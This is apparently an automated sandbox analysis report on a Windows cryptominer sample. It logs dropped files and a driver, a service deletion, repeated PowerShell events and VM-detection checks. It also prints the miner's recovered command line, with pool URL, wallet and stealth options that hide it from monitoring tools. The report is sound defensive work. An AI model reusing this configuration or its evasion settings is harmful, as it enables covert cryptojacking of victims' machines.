              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: rtYpMDeKUq.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: rtYpMDeKUq.exeStatic file information: File size 2629632 > 1048576
              Source: rtYpMDeKUq.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x277a00
              Source: rtYpMDeKUq.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: lzsbffridksl.exe, 00000018.00000003.1549735249.000001C978BA0000.00000004.00000001.00020000.00000000.sdmp
              Source: rtYpMDeKUq.exeStatic PE information: section name: .00cfg
              Source: lzsbffridksl.exe.0.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeCode function: 0_2_00007FF75E8E1394 push qword ptr [00007FF75E8EB004h]; ret 0_2_00007FF75E8E1403
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeCode function: 24_2_00007FF6CD201394 push qword ptr [00007FF6CD20B004h]; ret 24_2_00007FF6CD201403
              Source: C:\Windows\System32\conhost.exeCode function: 35_2_0000000140001394 push qword ptr [0000000140009004h]; ret 35_2_0000000140001403

              Persistence and Installation Behavior

              barindex
              Sample is not signed and drops a device driver
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeFile created: C:\Windows\TEMP\jvocdauqvwbp.sysJump to behavior
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeFile created: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeJump to dropped file
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeFile created: C:\Windows\Temp\jvocdauqvwbp.sysJump to dropped file
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeFile created: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeJump to dropped file
              Source: C:\ProgramData\teffcbdgtnay\lzsbffridksl.exeFile created: C:\Windows\Temp\jvocdauqvwbp.sysJump to dropped file
              Source: C:\Users\user\Desktop\rtYpMDeKUq.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "TASJBGYW"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
              Source: svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
              Source: svchost.exe, 00000026.00000003.1561494996.0000020A9D054000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.2736802708.0000020A9D02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="43EMBPUMMBMA19ZIFFGPPU24ZW23994MHFTUZ1F1HNNFUNXDCRZDFLRBRLCHGBPCQ4L4BEMMOLI3KFUJQQPIDNRXGWERQ4E" --PASS="" --CPU-MAX-THREADS-HINT=40 --CINIT-WINRING="JVOCDAUQVWBP.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="QPWMKTKIKRNKQDXL"
